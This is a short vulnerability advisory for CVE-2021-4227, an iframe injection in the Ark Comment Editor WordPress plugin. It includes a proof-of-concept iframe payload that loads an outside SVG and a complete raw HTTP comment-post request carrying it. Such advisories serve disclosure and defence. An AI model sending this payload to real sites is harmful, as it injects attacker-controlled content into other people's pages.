Ark Comment Editor <= 2.15.6 – Iframe Injection via Comment | CVE 2021-4227

Description

The plugin does not properly sanitise or encode the comments when in Source editor, allowing attackers to inject an iFrame in the page and thus load arbitrary content from any page to the comment section

Proof of Concept

Go to a post in the Frontend, select the 'Source' option in the Comment box generated by the plugin and add a payload such as <iframe src="http://brutelogic.com.br/poc.svg">

Depending on the user status (e.g unauthenticated), the comment might have to be approved first for the iframe to be loaded.

POST /wp-comments-post.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 131
Connection: close
Upgrade-Insecure-Requests: 1

comment=%3Ciframe+src%3D%22http%3A%2F%2Fbrutelogic.com.br%2Fpoc.svg%22%3E&submit=Post+Comment&comment_post_ID=5886&comment_parent=0